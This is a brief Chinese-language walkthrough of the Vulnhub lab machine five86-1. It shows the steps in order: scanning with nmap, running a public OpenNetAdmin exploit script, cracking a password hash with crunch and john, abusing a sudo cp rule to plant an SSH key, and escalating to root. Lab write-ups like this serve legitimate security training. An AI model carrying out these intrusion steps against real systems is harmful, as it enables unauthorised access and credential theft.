【Vulnhub】five86-1

nmap -A -p- 扫描一下端口

访问一下，哎，这不是 openadmin 嘛（【HTB】OpenAdmin）

searchsploit opennetadmin

然后把搜出来的那个复制出来 searchsploit -m 47691

可能会有些问题，复制出来一份给他权限再执行就没问题了

./47691.sh http://192.168.149.169/ona/

find / -type f -user www-data

看一下，有哪些文件是 www-data 可以读的

得到

douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

保存为 hash.txt

同时提到是 10 位数的密码，所以

crunch 10 10 aefhrt > dict.txt

使用 john 爆破一下

john --wordlist=dict.txt hash.txt

douglas:fatherrrrr

尝试用 ssh 登录一下

sudo -l 看一下，发现可以不用密码来执行 jen 用户的 cp

我们来把密钥拷贝出来，待会使用 ssh 登录 jen 用户

ssh-keygen -t rsacp /home/douglas/.ssh/hack.pub /tmp/authorized_keyssudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/

使用刚才生成的密钥登录

ssh jen@192.168.149.169 -i /home/douglas/.ssh/hack

看一下邮件，他告诉我们：

Moss's password is now Fire!Fire!

我们 su 切换账户 moss

发现一个 upyourgame，运行就可以啦

emmmm，好随意的啊

在 /root 目录下可以发现 flag